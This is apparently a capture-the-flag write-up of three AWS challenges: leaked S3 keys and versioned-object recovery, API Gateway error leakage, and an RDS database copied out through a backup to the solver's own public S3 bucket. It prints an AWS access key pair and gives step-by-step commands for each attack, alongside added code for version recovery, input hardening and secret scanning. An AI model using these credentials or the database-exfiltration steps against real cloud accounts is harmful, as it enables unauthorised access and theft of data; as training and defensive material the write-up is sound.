0x00 The hidden challenge from the Infiltrate 2019 AWS booth
Start at "Greetings from the AWS Infiltrate Booth!". The instructions hint that the third challenge is hidden:
Third challenge is..somewhere? Around here? Elsewhere? Who knows.
Look through the page source for clues:
$ curl http://infiltrate.s3-website-us-east-1.amazonaws.com/
At the end of the HTML there is an AJAX request:
<script>
function g(text) {document.getElementById("heading").innerHTML="<h1>"+text+"</h1>";}
var awsimage=document.getElementById("AwsImage");
var xhr=new XMLHttpRequest();
// Promises, yo! Learn to use Promises!
xhr.onreadystatechange=function() {
  if (this.readyState==4 && this.status==200) {
    var results=JSON.parse(this.responseText);
    awsimage.src="https://"+results["bucket"]+"/img/"+results["image"];
  }
};
xhr.open("GET", "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=2&grabImage=1", true);
xhr.send();
g("Welcome!");
</script>
Requesting that endpoint with curl returns an AWS Access Key ID (field1) and AWS Secret Access Key (field2) alongside the image name and bucket:
$ curl -s "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=2&grabImage=1" |jq .
{
"field2": "5/S8sTjlK2R6rIPvyhVl8GdTGEAceii52dN7cBnl",
"image": "aws_1.png",
"field1": "AKIAYOLTDOPA46OXMUO2",
"bucket": "s3-us-west-2.amazonaws.com/c9092b7e-b87e-4aa8-ba59-67664c2133b1"
}
The region can be confirmed with dig cxwudbwxhc.execute-api.us-west-2.amazonaws.com, though the hostname already says us-west-2. With the key pair and the region we can configure a local awscli profile:
$ aws configure --profile infiltrate2019
AWS Access Key ID [****************MUO2]:
AWS Secret Access Key [****************cBnl]:
Default region name [us-west-2]:
Listing the bucket from the API response shows a prefix f6f61719-4736-4421-9775-ce7651ab25e2 containing backup.tgz and notes.txt. Sync them to the local machine:
$ aws s3 sync s3://c9092b7e-b87e-4aa8-ba59-67664c2133b1/f6f61719-4736-4421-9775-ce7651ab25e2/ . --profile infiltrate2019
download: s3://c9092b7e-b87e-4aa8-ba59-67664c2133b1/f6f61719-4736-4421-9775-ce7651ab25e2/notes.txt to ./notes.txt
download: s3://c9092b7e-b87e-4aa8-ba59-67664c2133b1/f6f61719-4736-4421-9775-ce7651ab25e2/backup.tgz to ./backup.tgz
notes.txt contains nothing of interest. Unpacking backup.tgz reveals saved_message.eml; opened in Outlook it shows as an empty message (the header declares a multipart/alternative boundary but the body contains no MIME part, so a mail client renders nothing), which is suspicious, so view it with cat on the command line:
$ tar zxvf backup.tgz
x aws_1.png
x aws_2.png
x aws_3.png
x aws_4.png
x aws_5.png
x aws_6.png
x aws_7.png
x saved_message.eml
$ cat saved_message.eml
From: Alice <alice@example.com>
To: <bob@example.com>
Message-ID: <162228743.1958841594770323115.KittyKat@deliver.my.email.net>
Subject: Really necessary??
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_85228_1905676953.1554775383225"
iSightTracking: 6f0c16a3-032f-42eb-8741-68486d97ffcd
Date: Tue, 4 Apr 2017 02:03:03 +0000
X-EOPAttributedMessage: 0
Hey, Bob!
I'm still not sure that API is a good idea. You included all of those
function() functions to do useful things but I'm still thinking that
cowsay() was a bad move. Yes...I know that a bad guy would need to add
"cowsays=moo" for it to do anything but I think we should be *more*
security-conscious.
~ Alice
P.S. Maybe unicornsay()? I like unicorns.
Following the hint in saved_message.eml, call the API gateway with function=cowsay and the cowsays=moo parameter; it returns another S3 bucket name:
curl -s "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=cowsay&cowsays=moo"
"\n< s3://83d9a67f-0e37-499b-b7ba-abd50bd82307 >\n \\ ^__^\n \\ (oo)\\_______\n (__)\\ )\\/ ||----w |\n || ||\n"
The bucket 83d9a67f-0e37-499b-b7ba-abd50bd82307 holds a single instructions.txt, and the sensitive part has been REDACTED:
$ aws s3 sync s3://83d9a67f-0e37-499b-b7ba-abd50bd82307/ . --profile infiltrate2019
download: s3://83d9a67f-0e37-499b-b7ba-abd50bd82307/instructions.txt to ./instructions.txt
$ cat instructions.txt
Alice,
I stashed the goodies where you can find them! ;)
<REDACTED>
<REDACTED>
P.S. I'm sorry. The IT nerds told me to redact the above material. Apparently, it's a "security issue". :(
Check whether the bucket has versioning enabled; if it does, the version from before the redaction can still be retrieved:
$ aws s3api list-object-versions --bucket 83d9a67f-0e37-499b-b7ba-abd50bd82307 --profile infiltrate2019
{
"Versions": [
{
"LastModified": "2019-04-15T23:13:48.000Z",
"VersionId": "Biu1AbfSB8uE01qH1qzX0ECrv3apXCO_",
"ETag": "\"2afaecf2c80d67e1c0d1b0436836f21f\"",
"StorageClass": "STANDARD",
"Key": "instructions.txt",
"IsLatest": true,
"Size": 193
},
{
"LastModified": "2019-04-15T23:11:38.000Z",
"VersionId": "htYR1xwmCeZugJX_1NtI4n2XILZ9xZyf",
"ETag": "\"a7835a12dd31c1efaaca1dbd5cbaa2c5\"",
"StorageClass": "STANDARD",
"Key": "instructions.txt",
"IsLatest": false,
"Size": 108
}
]
}
Versioning is enabled, so download the earlier version of instructions.txt:
$ aws s3api get-object --bucket 83d9a67f-0e37-499b-b7ba-abd50bd82307 --key "instructions.txt" ori-instructions.txt --version-id htYR1xwmCeZugJX_1NtI4n2XILZ9xZyf --profile infiltrate2019
{
"AcceptRanges": "bytes",
"ContentType": "text/plain",
"LastModified": "Mon, 15 Apr 2019 23:11:38 GMT",
"ContentLength": 108,
"VersionId": "htYR1xwmCeZugJX_1NtI4n2XILZ9xZyf",
"ETag": "\"a7835a12dd31c1efaaca1dbd5cbaa2c5\"",
"Metadata": {}
}
$ cat ori-instructions.txt
Alice,
I stashed the goodies where you can find them! ;)
function=ScumAndVillainy
MosEisley=<anything>
Following the recovered instructions, change the function and parameter once more to get the final flag:
$ curl "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=ScumAndVillainy&MosEisley=moo" -s | jq .
"flag{33e842a3-eaea-4b1e-8637-5cf6c686e0de}"
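The versioning trick above is worth generalising. The following Python example is added here and is not part of the original writeup: it takes the JSON printed by aws s3api list-object-versions, picks out every superseded version and every object that currently sits behind a delete marker (which a plain aws s3 ls never shows), and emits the get-object commands needed to pull them. The listing is constructed from the page's output plus a made-up key secrets.env and its delete marker; the bucket and profile names are the ones used above.

```python
import json
from datetime import datetime

# Constructed listing in the shape of `aws s3api list-object-versions` output.
# The two instructions.txt entries are the ones from the writeup; "secrets.env"
# and its delete marker are made up to show a deleted-but-recoverable object.
LISTING = json.loads("""
{
  "Versions": [
    {"LastModified": "2019-04-15T23:13:48.000Z", "VersionId": "Biu1AbfSB8uE01qH1qzX0ECrv3apXCO_",
     "Key": "instructions.txt", "IsLatest": true, "Size": 193},
    {"LastModified": "2019-04-15T23:11:38.000Z", "VersionId": "htYR1xwmCeZugJX_1NtI4n2XILZ9xZyf",
     "Key": "instructions.txt", "IsLatest": false, "Size": 108},
    {"LastModified": "2019-04-10T10:00:00.000Z", "VersionId": "v1-constructed",
     "Key": "secrets.env", "IsLatest": false, "Size": 57}
  ],
  "DeleteMarkers": [
    {"LastModified": "2019-04-12T08:30:00.000Z", "VersionId": "dm1-constructed",
     "Key": "secrets.env", "IsLatest": true}
  ]
}
""")


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%fZ")


def deleted_keys(listing):
    """Keys whose current state is a delete marker: `aws s3 ls` will not show
    them at all, but their old versions are still in the bucket."""
    return {m["Key"] for m in listing.get("DeleteMarkers", []) if m.get("IsLatest")}


def hidden_versions(listing):
    """{key: [version, ...]} for every version a plain GET would not return,
    oldest first. S3 marks a version IsLatest only when it is the current object,
    so everything with IsLatest false is either superseded or behind a delete marker."""
    out = {}
    for v in listing.get("Versions", []):
        if not v.get("IsLatest"):
            out.setdefault(v["Key"], []).append(v)
    for versions in out.values():
        versions.sort(key=lambda v: _ts(v["LastModified"]))
    return out


def recovery_commands(listing, bucket, profile=None):
    """One `aws s3api get-object --version-id ...` per hidden version, each
    written to <key>.v<n> so nothing is overwritten locally."""
    prof = f" --profile {profile}" if profile else ""
    cmds = []
    for key, versions in sorted(hidden_versions(listing).items()):
        for n, v in enumerate(versions):
            cmds.append(
                f"aws s3api get-object --bucket {bucket} --key '{key}' "
                f"--version-id {v['VersionId']} '{key}.v{n}'{prof}"
            )
    return cmds


if __name__ == "__main__":
    print("deleted keys:", sorted(deleted_keys(LISTING)))
    for cmd in recovery_commands(LISTING, "83d9a67f-0e37-499b-b7ba-abd50bd82307", "infiltrate2019"):
        print(cmd)
```

Two permission notes: the listing needs s3:ListBucketVersions and each fetch needs s3:GetObjectVersion, so a key that only has s3:GetObject sees the redacted current version and nothing else. The CLI paginates list-object-versions automatically, but if you drive the API yourself you must follow NextKeyMarker/NextVersionIdMarker or you will miss older versions.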
0x01 An API Gateway challenge from a CTF
The description is short: obtain an invite code and register on the site.
Again start with the static HTML hosted on an S3 bucket: a page with login and registration forms. The source contains an AJAX request to API Gateway and a commented-out HTML line; the alert in the error handler suggests that the error responses will leak useful hints.
curl -s http://chanllenge1.s3-website-us-west-1.amazonaws.com/
<script type="text/javascript">
$(document).ready(function() {
$("#submit").click(function(e) {
e.preventDefault();
$.ajax({
type: "GET",
dataType: 'json',
crossDomain: true,
contentType: "text/plain; charset=utf-8",
url: 'https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/login?rolename=signin&extId=7369676E696E',
success: function(res){
},
error:function(xhr, ajaxOptions, thrownError){
alert('Lambda returned error\n\n remember, error are very useful!');
}
}); }) });
</script>
<!-- need to remove after testing: http://chanllenge1.s3-website-us-west-1.amazonaws.com/demo.html -->
From the API Gateway error responses we learn that the invite endpoint needs a rolename and an extId; judging from the path and the error text, rolename is presumably invite:
curl -s https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/invite/ |jq .
{"errorMessage": "'rolename'", "errorType": "KeyError", "stackTrace": [["/var/task/lambda_function.py", 11, "lambda_handler", "rolename = str(event['query']['rolename'])"]]}
curl -s "https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/invite/?rolename=invite"
{"errorMessage": "'extId'", "errorType": "KeyError", "stackTrace": [["/var/task/lambda_function.py", 12, "lambda_handler", "extId = str(event['query']['extId'])"]]}
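Those KeyError traces are the handler indexing event['query'] directly and letting the Lambda runtime serialise the exception for the caller. The Python below is an added example and not the challenge's code (its source is never shown): a stand-in handler with the same defect next to one that validates its inputs and answers every failure with a generic 400 or 403, logging the detail server-side instead. simulate_runtime mimics the error document the runtime produced. The hex-decode step and the rule that extId must decode to rolename are assumptions made for this example so the hardened handler has something concrete to validate.

```python
import json
import traceback


def leaky_handler(event, context=None):
    """Constructed stand-in for the challenge's lambda_handler: it indexes the
    query map directly, so a missing parameter raises KeyError and the runtime
    reports the key name (and source line) to whoever called the API."""
    rolename = str(event['query']['rolename'])
    extId = str(event['query']['extId'])
    return {"statusCode": 200, "body": json.dumps({"rolename": rolename, "extId": extId})}


def simulate_runtime(handler, event):
    """Mimic the error document the Lambda runtime returns for an unhandled
    exception when API Gateway passes it straight back to the client."""
    try:
        return handler(event)
    except Exception as exc:
        return {"errorMessage": str(exc), "errorType": type(exc).__name__,
                "stackTrace": traceback.format_exc().splitlines()}


REQUIRED = ("rolename", "extId")


def hardened_handler(event, context=None):
    """Same contract, but input is validated and every failure maps to a generic
    client response. Details go to print() (CloudWatch Logs), never to the caller.
    Assumption for this example: extId must be the hex encoding of rolename."""
    query = event.get("query") or {}
    if any(not isinstance(query.get(k), str) or not query[k] for k in REQUIRED):
        print("rejected: missing or empty parameter")
        return {"statusCode": 400, "body": json.dumps({"error": "bad request"})}
    try:
        decoded = bytes.fromhex(query["extId"]).decode("ascii")
    except ValueError:  # covers bad hex and non-ASCII bytes alike
        print("rejected: extId is not hex-encoded ASCII")
        return {"statusCode": 400, "body": json.dumps({"error": "bad request"})}
    if decoded != query["rolename"]:
        print("rejected: extId does not match rolename")
        return {"statusCode": 403, "body": json.dumps({"error": "forbidden"})}
    return {"statusCode": 200, "body": json.dumps({"rolename": query["rolename"]})}


if __name__ == "__main__":
    print(json.dumps(simulate_runtime(leaky_handler, {"query": {}}), indent=1))
    print(hardened_handler({"query": {}}))
    print(hardened_handler({"query": {"rolename": "invite", "extId": "696e76697465"}}))
```

The point of the hardened version is not the specific rule but the shape: parse, validate, and map every exception to a fixed response, so an attacker probing with missing or malformed parameters gets the same answer each time and has to guess parameter names instead of reading them out of a stack trace.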
So what is extId? Visiting http://chanllenge1.s3-website-us-west-1.amazonaws.com/demo.html returns the following text:
Operation   Type     Condition          required?
signup      signup   user               7369676e757075736572
signin      signin   from admin pool    7369676e696e61646d696e
invite      invite   ?                  ?
Running the two known values through Burp Suite's "smart decode" shows they are plain ASCII hex:
7369676e757075736572 decodes to signupuser
7369676e696e61646d696e decodes to signinadmin
So hex-encode invite the same way (696e76697465) and pass it as extId; that yields the final flag:
curl -s "https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/invite/?rolename=invite&extId=696e76697465" | jq .
"Congratulations! flag is : CTF{1234_6666_2234_9999_0101} "
0x02 An RDS challenge from a CTF
This challenge hands you an application debug log file. From it we can pull an MSSQL account and a hostname under us-west-1.rds.amazonaws.com.
Connect to the RDS instance with Navicat, check the server version and browse the available databases and tables:
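Both the Infiltrate API response in 0x00 and this log file handed over credentials in plain text, which is exactly what a secrets scan over logs, HTTP responses and repos is meant to catch. The Python below is an added example and not part of the original writeup: it pulls AWS access key IDs, 40-character secrets that sit next to a "secret access key" label, RDS endpoints and connection-string passwords out of text. The log lines are constructed for the example; the key pair is the one the Infiltrate API returned, while the RDS hostname, user and password are made up.

```python
import re

# Constructed log excerpt (not from the challenge). The AKIA/secret pair is the one
# the Infiltrate API handed out; the RDS hostname, user and password are made up.
SAMPLE_LOG = """\
2019-03-11 13:20:01 INFO  connecting to challenge-db.c0ffee000000.us-west-1.rds.amazonaws.com:1433 as dbadmin
2019-03-11 13:20:01 DEBUG conn: Server=challenge-db.c0ffee000000.us-west-1.rds.amazonaws.com;User Id=dbadmin;Password=Winter2019!;
2019-03-11 13:20:02 DEBUG s3 client: AWS_ACCESS_KEY_ID=AKIAYOLTDOPA46OXMUO2 AWS_SECRET_ACCESS_KEY=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
2019-03-11 13:20:03 INFO  nothing of interest on this line
"""

PATTERNS = {
    # long-term (AKIA) and temporary (ASIA) access key IDs: 4-char prefix + 16 chars
    "aws_access_key_id": re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b"),
    # a 40-char base64-ish token next to a "secret access key" label; the label is
    # required because bare 40-char tokens are far too common to flag on their own
    "aws_secret_access_key": re.compile(
        r"(?i)secret[_ -]?access[_ -]?key\W{0,3}([A-Za-z0-9/+]{40})(?![A-Za-z0-9/+])"),
    # <instance>.<account hash>.<region>.rds.amazonaws.com
    "rds_endpoint": re.compile(
        r"\b([a-z0-9-]+\.[a-z0-9]+\.[a-z]{2}-[a-z]+-\d\.rds\.amazonaws\.com)\b", re.I),
    # Password=... inside an ADO/ODBC-style connection string
    "password_in_connstr": re.compile(r"(?i)\bpassword\s*=\s*([^;\s]+)"),
}


def scan(text):
    """Return [(line_no, kind, value)] for every distinct secret-looking token."""
    findings, seen = [], set()
    for n, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS.items():
            for m in rx.finditer(line):
                if (kind, m.group(1)) not in seen:
                    seen.add((kind, m.group(1)))
                    findings.append((n, kind, m.group(1)))
    return findings


def mask(value, keep=4):
    """Show only a prefix so the report itself does not become a second leak."""
    return value[:keep] + "*" * max(0, len(value) - keep)


if __name__ == "__main__":
    for n, kind, value in scan(SAMPLE_LOG):
        print(f"line {n:>3}  {kind:<24} {mask(value)}")
```

The access-key pattern is precise enough to run on its own; the secret-key pattern deliberately requires a nearby label, because a 40-character base64 string matches far too much (hashes, session tokens) and the real check for a suspected pair is to feed it to aws sts get-caller-identity.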
SELECT @@version
Microsoft SQL Server 2017 - 14.0.3035.2 (X64)
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'flag');
flag_id
The flag_id column of the flag table should be where the flag lives, but browsing it in Navicat fails with a permission error. So check whether we have backup rights instead: if we do, the whole database can be backed up to S3 and restored locally.
First create an S3 bucket with public permissions in your own account (called sqlbackup here), then go back to the Navicat console and run the following. (rds_backup_database only exists when the instance's option group carries the SQLSERVER_BACKUP_RESTORE option, and the upload is performed by that option's IAM role, so the destination bucket has to be writable by that role; opening the bucket up is the quick way to satisfy that from another account.)
exec msdb.dbo.rds_backup_database
@source_db_name='secrets',
@s3_arn_to_backup_to='arn:aws:s3:::sqlbackup/sql.bak',
@overwrite_S3_backup_file=1,
@type='FULL';
It succeeds, so we do have backup rights. Depending on the size of the database the backup takes a while; progress can be checked with:
exec msdb.dbo.rds_task_status @db_name='secrets';
task_id  task_type  database_name  % complete  duration(mins)  lifecycle
8        BACKUP_DB  secrets        100         2               SUCCESS
task_info:
[2019-03-11 13:25:22.013] Task execution has started.
[2019-03-11 13:25:22.110] 6 percent processed.
[2019-03-11 13:25:22.123] Processed 384 pages for database 'wwi-secrets', file 'secrets' on file 1.
[2019-03-11 13:25:22.140] 100 percent processed.
[2019-03-11 13:25:22.140] BACKUP DATABASE successfully processed 386 pages in 0.009 seconds (334.255 MB/sec).
[2019-03-11 13:26:22.013] sql.bak: Completing S3 upload, waiting for S3 workers to clean up and exit
[2019-03-11 13:26:22.183] sql.bak: Completed processing 100% of S3 chunks.
[2019-03-11 13:26:22.357] sql.bak: Final chunk written to S3 successfully.
[2019-03-11 13:26:22.360] sql.bak: S3 processing completed successfully
[2019-03-11 13:26:22.360] Command execution completed successfully.
last_updated: 2019-03-11 13:26:22.360   created_at: 2019-03-11 13:24:26.526   S3_object_arn: arn:aws:s3:::sqlbackup/sql.bak   overwrite_S3_backup_file: 1
Then download sql.bak from the bucket, restore it on a local SQL Server instance (for example through SQL Server Management Studio), and read the flag out of flag.flag_id.